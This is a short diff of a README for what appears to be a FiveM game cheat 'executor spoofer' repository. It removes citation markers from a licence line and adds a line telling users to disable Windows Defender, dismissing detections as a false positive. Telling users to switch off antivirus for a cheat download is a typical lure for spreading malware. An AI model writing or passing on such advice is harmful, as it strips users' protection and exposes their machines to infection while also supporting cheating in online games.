GHOSTExternal/GHOST---FiveM-Lua-Executor-Spoofer/README.md

 A: We strive to provide updates regularly, typically every month.[citation:2]

 ## 📜 MIT License
-This repository is licensed under the MIT License.[citation:4][citation:9]
+This repository is licensed under the MIT License.

+DISABLE WINDOWS DEFENDER - False positive, you are running a spoofer.